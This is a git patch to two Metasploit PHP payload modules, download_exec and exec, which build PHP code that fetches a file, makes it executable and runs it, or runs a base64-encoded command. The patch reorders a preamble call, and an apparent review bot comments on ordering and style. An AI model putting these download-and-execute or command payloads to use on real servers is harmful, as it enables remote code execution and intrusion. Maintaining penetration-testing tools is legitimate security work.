From ff20cf911caa11f5623e70fe9f0b0cc1eea8929e Mon Sep 17 00:00:00 2001
From: James Lee
Date: Thu, 2 Feb 2017 14:53:53 -0600
Subject: [PATCH] Move the preamble above all other code
---
 modules/payloads/singles/php/download_exec.rb | 2 +-
 modules/payloads/singles/php/exec.rb | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb
index c0f5941236..e0faa3633f 100644
--- a/modules/payloads/singles/php/download_exec.rb
+++ b/modules/payloads/singles/php/download_exec.rb
@@ -40,6 +40,7 @@ module MetasploitModule
 exename = Rex::Text.rand_text_alpha(rand(8) + 4)
 dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
 shell = <<-END_OF_PHP_CODE
+ #{php_preamble({:disabled_varname => dis})}
 if (!function_exists('sys_get_temp_dir')) {
 function sys_get_temp_dir() {
 if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
@@ -63,7 +64,6 @@ module MetasploitModule
 fclose($fd_out);
 chmod($fname, 0777);
 $c = $fname;
- #{php_preamble({:disabled_varname => dis})}
 #{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})}
 @unlink($fname);
 END_OF_PHP_CODE
diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb
index 09b07f6530..b6872d7aa1 100644
--- a/modules/payloads/singles/php/exec.rb
+++ b/modules/payloads/singles/php/exec.rb
@@ -37,9 +37,9 @@ module MetasploitModule
 cmd = Rex::Text.encode_base64(datastore['CMD'])
 dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
 shell = <<-END_OF_PHP_CODE
+ #{php_preamble(disabled_varname: dis)}
 $c = base64_decode("#{cmd}");
- #{php_preamble({:disabled_varname => dis})}
- #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}
+ #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
 END_OF_PHP_CODE
 return Rex::Text.compress(shell)
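Review bot: In download_exec.rb's first hunk (`@@ -40,6 +40,7 @@`) and in the exec.rb hunk, nothing in the Ruby source records that `php_preamble` has to remain the first thing in the heredoc, so a later edit can put code ahead of it again without anyone noticing. A Ruby comment above `shell = <<-END_OF_PHP_CODE` would pin that down without ending up in the generated script, e.g. `# Keep php_preamble first in the heredoc; anything placed before it runs before the preamble takes effect.` As a style point, exec.rb now calls `php_preamble(disabled_varname: dis)` while download_exec.rb keeps `php_preamble({:disabled_varname => dis})` and the hash-rocket `php_system_block` call; using the same form in both files would keep them easy to compare. The enclosing method starts and ends outside both hunks.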